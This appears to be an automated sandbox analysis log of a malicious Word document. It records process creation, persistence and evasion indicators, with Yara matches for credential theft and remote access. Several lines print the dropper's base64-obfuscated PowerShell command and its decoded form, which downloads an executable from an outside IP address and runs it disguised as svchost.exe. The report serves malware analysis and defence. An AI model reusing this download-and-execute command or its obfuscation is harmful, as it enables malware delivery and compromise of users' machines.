Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: msimg32.dll
Source: 472.rtf.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\ 472.rtf.doc
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 472.rtf.doc Initial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244DE6C push ebp; retf 7_2_0244DE6F
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244CD12 push ebx; iretd 7_2_0244CD37
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244CB19 pushad ; iretd 7_2_0244CB1A
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244FC2D push esp; retf 7_2_0244FC30
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244CB97 push ebx; iretd 7_2_0244CD37
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_02451AA2 push 94B57A95h; iretd 7_2_02451AB6

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\svchost.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\svchost.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\timeout.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3147
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1290
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4270
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 288 Thread sleep count: 3147 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 288 Thread sleep count: 459 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3080 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116 Thread sleep count: 1290 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116 Thread sleep count: 4270 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0022092B mov eax, dword ptr fs:[00000030h] 7_2_0022092B
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_00220D90 mov eax, dword ptr fs:[00000030h] 7_2_00220D90
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244B7E8 push dword ptr fs:[00000030h] 7_2_0244B7E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTR
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded $Web = New-Object System.Net.WebClient; $Url = 'http://45.84.0.173/download_22/server.exe'; $Pth = "$env:Temp\svchost.exe"; $Web.DownloadFile($Url, $Pth); Invoke-Expression $Pth;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c $b = [text.encoding]::utf8.getstring([convert]::frombase64string('jfdlyia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7icrvcmwgpsanahr0cdovlzq1ljg0ljaumtczl2rvd25sb2fkxziyl3nlcnzlci5legunoyakuhroid0giirlbny6vgvtcfxzdmnob3n0lmv4zsi7icrxzwiurg93bmxvywrgawxlkcrvcmwsicrqdggpoybjbnzva2utrxhwcmvzc2lvbiakuhroow==')); $c = [convert]::tobase64string([text.encoding]::unicode.getbytes($b)); powershell -e $c;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabxaguaygagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0adsaiaakafuacgbsacaapqagaccaaab0ahqacaa6ac8alwa0adualga4adqalgawac4amqa3admalwbkag8adwbuagwabwbhagqaxwayadialwbzaguacgb2aguacgauaguaeablaccaowagacqauab0aggaiaa9acaaigakaguabgb2adoavablag0acabcahmadgbjaggabwbzahqalgblahgazqaiadsaiaakafcazqbiac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakafuacgbsacwaiaakafaadaboackaowagaekabgb2ag8aawblac0arqb4ahaacgblahmacwbpag8abgagacqauab0aggaowa=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0040512A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 7_2_0040512A

Stealing of Sensitive Information

Source: Yara match File source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality

Source: Yara match File source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE